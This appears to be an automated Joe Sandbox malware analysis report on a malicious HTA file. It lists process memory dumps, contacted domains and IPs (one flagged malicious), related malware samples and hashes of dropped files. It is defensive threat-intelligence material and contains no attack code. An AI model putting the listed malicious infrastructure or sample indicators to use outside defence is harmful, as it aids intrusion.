00000001.00000002.12579079120.000000000BE6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509932117.000000000BE33000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550466374.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556081838.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542545061.000000000963F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              https://www.americanas.com.br/categoria/mercado/bebidas/bebidas-alcoolicas/vinhomshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504149097.000000000A97E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506503755.000000000A99B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511332893.000000000A99C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550895184.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559750595.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574494320.000000000961C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                https://www.americanas.com.br/categoria/utilidadesnmshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541754594.00000000096CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12549952415.00000000096CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509850041.0000000009698000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510847946.00000000096C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                  • 75% < No. of IPs
                                                                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                  16.12.2.36
                                                                                                                                                                                                                                  s3-sa-east-1.amazonaws.comUnited States
                                                                                                                                                                                                                                  unknownunknownfalse
                                                                                                                                                                                                                                  172.217.19.194
                                                                                                                                                                                                                                  securepubads.g.doubleclick.netUnited States
                                                                                                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                                                                                                  3.5.232.130
                                                                                                                                                                                                                                  s3-r-w.sa-east-1.amazonaws.comUnited States
                                                                                                                                                                                                                                  16509AMAZON-02USfalse
                                                                                                                                                                                                                                  92.205.57.102
                                                                                                                                                                                                                                  102.57.205.92.host.secureserver.netGermany
                                                                                                                                                                                                                                  8972GD-EMEA-DC-SXB1DEtrue
                                                                                                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                  Analysis ID:1579831
                                                                                                                                                                                                                                  Start date and time:2024-12-23 10:39:19 +01:00
                                                                                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                  Overall analysis duration:0h 6m 2s
                                                                                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                  Report type:full
                                                                                                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                                                                                                  Analysis system description:Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
                                                                                                                                                                                                                                  Run name:Potential for more IOCs and behavior
                                                                                                                                                                                                                                  Number of analysed new started processes analysed:41
                                                                                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                                                                                  Technologies:
                                                                                                                                                                                                                                  • HCA enabled
                                                                                                                                                                                                                                  • EGA enabled
                                                                                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                                                                                  Sample name:Archivo-PxFkiLTWYG-23122024095010.hta
                                                                                                                                                                                                                                  Detection:MAL
                                                                                                                                                                                                                                  Classification:mal76.evad.winHTA@17/50@10/4
                                                                                                                                                                                                                                  EGA Information:Failed
                                                                                                                                                                                                                                  HCA Information:
                                                                                                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                                                                                                  • Number of executed functions: 130
                                                                                                                                                                                                                                  • Number of non-executed functions: 0
                                                                                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                                                                                  • Found application associated with file extension: .hta
                                                                                                                                                                                                                                  • Exclude process from analysis (whitelisted): audiodg.exe, dllhost.exe, BackgroundTransferHost.exe, SIHClient.exe, backgroundTaskHost.exe, appidcertstorecheck.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 204.79.197.203, 2.16.158.74, 2.16.158.59, 2.16.158.58, 2.16.158.82, 2.16.158.72, 2.16.158.80, 2.16.158.83, 2.16.158.75, 2.16.158.73, 142.250.181.104, 95.101.110.32, 95.101.110.61, 20.190.147.7, 20.190.177.82, 20.190.177.22, 20.190.147.3, 20.190.177.149, 20.190.147.2, 20.190.147.4, 20.190.147.10, 20.103.156.88, 23.44.201.11, 23.44.201.5, 184.28.90.27, 23.47.169.200, 172.202.163.200
                                                                                                                                                                                                                                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, sni-wildsan.b2wdigital.com.edgekey.net, e86303.dscx.akamaiedge.net, www.bing.com.edgekey.net, www.googletagmanager.com, login.live.com, th.bing.com, c.pki.goog, static.criteo.net, www.bing.com, assets.msn.com, e96427.dscb.akamaiedge.net, client.wns.windows.com, prdv4a.aadg.msidentity.com, fs.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, fd.api.iris.microsoft.com, a-0003.a-msedge.net, ctldl.windowsupdate.com, www-msn-com.a-0003.a-msedge.net, www-www.bing.com.trafficmanager.net, aefd.nelreports.net, login.msa.msidentity.com, x1.c.lencr.org, mm-mm.bing.net.trafficmanager.net, store-images.s-microsoft.com, res.public.onecdn.static.microsoft, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                                                                                                                                                  • Execution Graph export aborted for target mshta.exe, PID 3360 because there are no executed function
                                                                                                                                                                                                                                  • Execution Graph export aborted for target wscript.exe, PID 7300 because there are no executed function
                                                                                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                  • VT rate limit hit for: Archivo-PxFkiLTWYG-23122024095010.hta
                                                                                                                                                                                                                                  TimeTypeDescription
                                                                                                                                                                                                                                  04:41:22API Interceptor2x Sleep call for process: mshta.exe modified
                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                  92.205.57.102Factura - XwgyvMuOAO.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                    s3-r-w.sa-east-1.amazonaws.comdecrypt-main.dll.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 52.95.163.36
                                                                                                                                                                                                                                    decrypt-main.dll.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 16.12.1.62
                                                                                                                                                                                                                                    appdata -MpSvc.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 3.5.234.32
                                                                                                                                                                                                                                    appdata -MpSvc.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 3.5.233.174
                                                                                                                                                                                                                                    00023948209303294#U00ac320302282349843984903.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 3.5.232.137
                                                                                                                                                                                                                                    00023948209303294#U00ac320302282349843984903.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 16.12.1.14
                                                                                                                                                                                                                                    0219830219301290321012notas.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 3.5.232.21
                                                                                                                                                                                                                                    0219830219301290321012notas.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 3.5.234.1
                                                                                                                                                                                                                                    chrome.cloudflare-dns.comnTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 172.64.41.3
                                                                                                                                                                                                                                    gVKsiQIHqe.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                    • 172.64.41.3
                                                                                                                                                                                                                                    trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                    • 172.64.41.3
                                                                                                                                                                                                                                    Loader.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                    • 162.159.61.3
                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                    • 172.64.41.3
                                                                                                                                                                                                                                    MS100384UTC.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 162.159.61.3
                                                                                                                                                                                                                                    SWIFT.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 162.159.61.3
                                                                                                                                                                                                                                    Ocean-T2I4I8O9.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 162.159.61.3
                                                                                                                                                                                                                                    ktyihkdfesf.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                    • 172.64.41.3
                                                                                                                                                                                                                                    pjthjsdjgjrtavv.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                    • 162.159.61.3
                                                                                                                                                                                                                                    102.57.205.92.host.secureserver.netFactura - XwgyvMuOAO.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 92.205.57.102
                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                    GD-EMEA-DC-SXB1DEhmips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                    • 188.138.99.78
                                                                                                                                                                                                                                    https://atc-secure.com/nocod/wetransdnyd.html#k.muench@muenchundmuench.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 92.205.22.61
                                                                                                                                                                                                                                    236236236.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 91.250.85.177
                                                                                                                                                                                                                                    bot.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                    • 85.25.248.167
                                                                                                                                                                                                                                    bot.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                    • 85.25.248.111
                                                                                                                                                                                                                                    bot.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                    • 62.138.132.153
                                                                                                                                                                                                                                    armv4l.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                    • 62.75.161.26
                                                                                                                                                                                                                                    IGz.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                    • 62.138.26.111
                                                                                                                                                                                                                                    AMAZON-02USFBmz85HS0d.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 185.166.143.50
                                                                                                                                                                                                                                    armv5l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 108.159.159.70
                                                                                                                                                                                                                                    BJQizQ6sqT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 185.166.143.48
                                                                                                                                                                                                                                    jSFUzuYPG9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 52.216.152.124
                                                                                                                                                                                                                                    mG83m82qhF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 185.166.143.49
                                                                                                                                                                                                                                    LP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 185.166.143.49
                                                                                                                                                                                                                                    zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 52.217.67.100
                                                                                                                                                                                                                                    Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 52.217.18.140
                                                                                                                                                                                                                                    armv6l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 54.203.164.5
                                                                                                                                                                                                                                    No context
                                                                                                                                                                                                                                    No context
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                    File Type:PNG image data, 1250 x 313, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):230753
                                                                                                                                                                                                                                    Entropy (8bit):7.995131763292654
                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                    SSDEEP:6144:JOzhmQOfUCCStpBS1GPUPoHnBdNGsPbTQewPMcYDy8cislnCyVyDTG:8zkQkw1aUQ5Gsz9wUngislnCyUO
                                                                                                                                                                                                                                    MD5:48E40F4B5613BF236D7779BA4C2E6F7B
                                                                                                                                                                                                                                    SHA1:5D3EA09B769CE94B34CC4F58CDC0134F494CA3ED
                                                                                                                                                                                                                                    SHA-256:CDDB4D4014D8CB8BCF466CFC8DA1491B6AC3C8D5FA84B7699B072D50D888E540
                                                                                                                                                                                                                                    SHA-512:AEB620D81AEEF58ABFFD88E61E41F9279B89E6D3F3D4E2C2DEE545F9FBB81CF30E29F8241BDCB8DF811C1D12B49A34B5891A569F854AA8DD033CD3C7344F7D3E
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Preview:.PNG........IHDR.......9.....=G......pHYs............... .IDATx..[.$.}..........pfx.r$R.ER.%...rw....h-....'...f........_.........+..5.......]-E...Cr8.....s?u..?DfUV....:..CWW..Gdf..?..k<g.$c...j....W....x....+.J:.Xp~v:6.E.9>yN$.O.^.L..8.4.]..X\..4.._.5.....$..z......i.'V.qT&..o.u.....Y....m+.......D..K....+....lLI..L.........j.2.e..E.......V.h.?}..6.........1j.`.<....^...b..v...2\..G..%...q..\....?.....-..*..(..$.<."m:....q.yDO..7..B..).'..+..f..4....e.W...!..W$6.ZZ4..NX..W.<T.W!/Nn.]....j.q.....R6.zC.i......e.......G.e..F:.P.3..P...E.C.z.+k..H.'..?:.....I.2.=............Y.....,......o&..M"%..|*p.....tr>.{h%.....is..PdIo.$.Z$U......u..B..s.).O....,.-.&..:..^../^..[..6K...G..(.i..4m=;.Xp~..y..{.....jU..x[G.Im..243.+..Wt.".(.mM'E..d..Ia....R...b..]4..b...u?.*T.j.VX..J.W..:..y.I...d.&......x..7....-6...".e...eE..Y...p.D..h.........V~.s.zl....L.g.-.HO....d.py/.,..BW,g.Z...M..pY.Y-d.'.E..`..AB.Uc.&l.n...u..B....HyPa.A.vZE.h.....[..4.
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                    File Type:PNG image data, 1250 x 313, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):290605
                                                                                                                                                                                                                                    Entropy (8bit):7.995159121043485
                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                    SSDEEP:6144:YFC6Qj/std8oisE2bbxulMwlzoPGo9I4YdYgif5bDlM+kyHhJBMDKA:36msti8bxulMwlEPj/tSaBJBsKA
                                                                                                                                                                                                                                    MD5:2283059A30B7D44599CEA2C3F7A730C0
                                                                                                                                                                                                                                    SHA1:721D117512A481E70B67BE88A348672A6208E750
                                                                                                                                                                                                                                    SHA-256:17E74B21E1BAB0DCE4CA89037EEE9ED84DD704B57D68FEF666EFDF0EE4A8A2ED
                                                                                                                                                                                                                                    SHA-512:1EB454BE7E8785E5BC85A2E1C6957E72F9CC6B2959FA24EBD179849959EBB1EB7FD3D53CE92AAE95DFB7D299CB4D25114D1EC7E85DE6110DA8972565585236E1
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.PNG........IHDR.......9.....=G......pHYs............... .IDATx..Y.5.Y..{..{O.~.o:.....@..d..(.....B!8....v..k%w^N.r....|./'.W..^6.A..@.AH...#..#.oz.=uwU....=..{......v..Tu.P..?...x..(..f.j...4..{4.b~......*3../..0..y......+.h.bv.w......b.......Yn.N.gr.q..9,7....9.9..-w.1......}..2..{..V.M,r.Xo......Z..x..t.F.X.n...B..~v;:...u.-.V.t{.v..Z..ii...K.......m.w......vM.{r}n._..9.M.7}."..a.~.Xt.O...L3..E.....Y..'.Q....t:..6.T.D.M..jF.....q.W..18:._.].p..lX......u..>...l.6...WB...X(QbQ$P.p%J...u.c.g..?...8tV(.3......c2a.......i.4[.}~\'...?.....A.o.L...c.H.....8.tzy.L.w..[..w...n.ir.N..W;.....\..n..z@X.](...Nj.m..+.@....%J.(............l.e?/.m..*..b.]..iu'........B....id..a;..<...../..m..}..O.U<.fbqe.j..w.e..1o>).(.[.,.9).&.b.`..;....N.n.....?.....|<Fo.%J......'j%...u..b.t.....y9.lM$.|:.......F[>KQ.... kY..B=...lNo.Zm....<.9]=.J....em[......U.-{R,.O.:..h.g]l6.$.^.:.......0.....K.m`...u.e .~.(Qb>$....(.v.R.\g..."fM.F..A_..iF!l...g.m..
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                    File Type:PNG image data, 192 x 296, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):52094
                                                                                                                                                                                                                                    Entropy (8bit):7.989720330046295
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:768:D2fyj3bwxC6LUv/OmGtLRzGndqTfU0burK0xqnbpUFNj8rgNHRErldy77OPr9mkD:QWoI/OfjzGdqT/cEnbyNTNHOcfODAMD
                                                                                                                                                                                                                                    MD5:8053463CB146FB307F42877DF38CBD3B
                                                                                                                                                                                                                                    SHA1:42D65C57BB9CE4950D731CBD1AAE78A476805823
                                                                                                                                                                                                                                    SHA-256:53DA8D19CB85FD5D4E6AB43F5A2D252566A0703AEE0ED97B2D45BF5B6C5279C0
                                                                                                                                                                                                                                    SHA-512:92838B2DBC4A121A9E53C06C01D958D5B1F466799AB05F26E142A6E3258B39B81F6C067BB9A7BEFF7845DC33EC00F17330FA903F5343C0E95B115548C3EE903F
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.PNG........IHDR.......(........\....pHYs............... .IDATx..w.\U.....;}gKv7.-I6.........A.......c.)ME..AT..<*H.T@.D.;B.T..[.%$.^6...........p)..y.fw..s..{..{...mD.p.p.0...4..m.A.u..(.C.R.!.6.O@n[6..........d^.i.Q.K.<.+.[......$.s.....\.u.T......Jc....f.7.T.:..x.x.cH...`/..@..^u..a.p$.@..g3...]@.Kw^u.....IP..).n`......%.#..."..Yq.u....q..l....E@..9.:.xI..;..+..l.._.k.1..#..Y`.. W..-.N.s......2..>0o..|.....^...gdd.T:.....>...|.![...?bY_.e.L.s...e...8....b.o|.|b1..}..g......3......./p...m..;...........|.......K~.c.,~..w.s4..p..W.....W.....T*...o.........O...g.v.T..~.k..=..S\...x...q#.l..v.S?.Q..o.-.........>...../|...s..._\.+..g...y...q#..........:.'....u.q...fv.iG.[.~..i.......1.....w.....y.'..D.q.....u..`..../....E.?.;.<.:.G........{.?......._>............c.>.Ri.=?..b.8.mc....c..y.&.?.......:.K/.........__.....7n.......n.uO>...Zo......_.t..K.,.....~....._....<.._..'.....7....A.<.x|T.._.t.!.I..p..T.......8.z......'....
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                    File Type:PNG image data, 192 x 296, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):66188
                                                                                                                                                                                                                                    Entropy (8bit):7.9879339747373095
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:1536:WOTPfKbeCbS5aZHctZc3VtiioKR/PxGVeC0jsgKLuk4tgqGlUvHcE:WOTXKb+5aZ8jcfz1PxGQjs1uk4tFh
                                                                                                                                                                                                                                    MD5:30D5F85029436F20563AAA8CD7BA8D9A
                                                                                                                                                                                                                                    SHA1:56C3A1929E719F986449B5A2415B01A161163BF8
                                                                                                                                                                                                                                    SHA-256:AAE5FF63FB8C856697BE9CF8FB615D6CA594A90E8ACBA09B1EF7F7EEA82BBFB8
                                                                                                                                                                                                                                    SHA-512:7B9EDB6A0217D4C207FE814ACA031F34EC9500A1D8D28F2F3A95CFB5E3EF0CCD8B2DBE178B331DDD9126EA45DF56D6A0A8B4476A8D373AEB2EE4FA4288875C2E
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.PNG........IHDR.......(........\....pHYs............... .IDATx..{.%W}..9......R.$..A...01.1..0..&v...0.L ....v....W......`.........'....... [...P#..ZRw...Uu.....?~y...nuW..n..vtTU.'..<.s~...{~W..........w.&......&8.11...kL.`..........&8.11...kL.`..........&8.11...kX.w.>.......<....h......&x~....<.....&x~...h....nL0...4.{..1....j7a.&8.11...kL.`..........&8.11...kL.`..........&8.11...kL.`..........&8.11...kL.`..........&8.11...kL.`.....8...G.........w..i..s....1Y.&8.qr+.......}a...*...gx./.E[..G.o.._.t.=..~.v=5.Z7\...v.....+.......{w.5_y......c'../}...e.]...~..J.....5......z..z....O....~.L.<.....=.1qr+.{.........z..w...'.[........9..r...k_-.V..WJ....2....\...7....Y.-,...tr...?......N9...........+/?..;?.7.G^..>..w/3.q8...#..5..oX.....3..l................M..'v.`....y..m-...?'..p...-....z<v7...#g...#......o.....o.Y..o.*..G^...F..V.l.?/..?+...;.r'../.o..m.$.._.o....m.c......=r0.~Z~..'............|m.....o.9......L?G.....~ 38...ow.y..n..`.
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (3278)
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):3363
                                                                                                                                                                                                                                    Entropy (8bit):5.420736130767279
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:48:bG3okoZBVdsCxukqxcyjZ0YnB5pT3tH2yJaD27FKIMiFiTVMjEI:bGSa4unxcIZ0YB5pT9WeaaMIMQEI
                                                                                                                                                                                                                                    MD5:AF7E27FEE65430174E7F1C7D66D9D91C
                                                                                                                                                                                                                                    SHA1:8C120018222DF279E26EC10B69E30E1B532BC5BE
                                                                                                                                                                                                                                    SHA-256:9E13CD8C4BD0A9B569D3DFEAA43C95E0C8E61F3D7F31BFCE269ED2895FA395E7
                                                                                                                                                                                                                                    SHA-512:9E0A24C473BA5234BDE1B9014630972BAD4B16CA5AFC0D2696678F24225F310F69659864024EA45025CE5F988E0D87D27B1068BB0B08CAD404527BD8ABDB3877
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:"use strict";(self.__LOADABLE_LOADED_CHUNKS__=self.__LOADABLE_LOADED_CHUNKS__||[]).push([[4736],{42309:(n,t,r)=>{r.d(t,{J:()=>m,r:()=>c});var e=r(8821),i=r(85169),o=r(82248),a=r(46647),s=r(32735),u=r(56875),p=s.createElement,c=function(n){(0,o.Z)(r,n);var t=(0,a.Z)(r);function r(){return(0,e.Z)(this,r),t.apply(this,arguments)}return(0,i.Z)(r,[{key:"render",value:function(){return p(d,this.props)}}]),r}(s.Component),d=u.ZP.div.withConfig({displayName:"grid__StyledGrid",componentId:"sc-1man2hx-0"})(["flex:1;display:flex;justify-content:",";flex-wrap:wrap;"],(function(n){return n.justifyContent||"space-between"})),l=r(20011),f=s.createElement,m=function(n){(0,o.Z)(r,n);var t=(0,a.Z)(r);function r(){return(0,e.Z)(this,r),t.apply(this,arguments)}return(0,i.Z)(r,[{key:"render",value:function(){var n,t,r="theme-grid-col ".concat(null!==(n=null===this||void 0===this||null===(t=this.props)||void 0===t?void 0:t.className)&&void 0!==n?n:"").trim();return f(v,(0,l.Z)({},this.props,{className:r}))}
                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (8228)
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):8321
                                                                                                                                                                                                                                    Entropy (8bit):5.294678907318697
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:192:3bIpMVRrGnY+qdpZHmJECQdR2VCy2QDR2CCzg:9rGnypZHpdR2VCy1DR2CCzg
                                                                                                                                                                                                                                    MD5:98127D478753B944FDDE1270176F2917
                                                                                                                                                                                                                                    SHA1:0FAA7BBCD58224B16AF02D8B6AC491205B1C3DAC
                                                                                                                                                                                                                                    SHA-256:E69F7E4B00FBFE16B1929A0FD6608313425D73EDD934583132DBF3CB8C9A578E
                                                                                                                                                                                                                                    SHA-512:AF816A8F0586CA1663B5E8E624415E2F4A7BA2CD0587AFBB32E55D8042619F01614F98DB3B7064394F8C3A60116C6580EE977D13F7B7E08D48B28718B36B472B
                                                                                                                                                                                                                                    Malicious:false
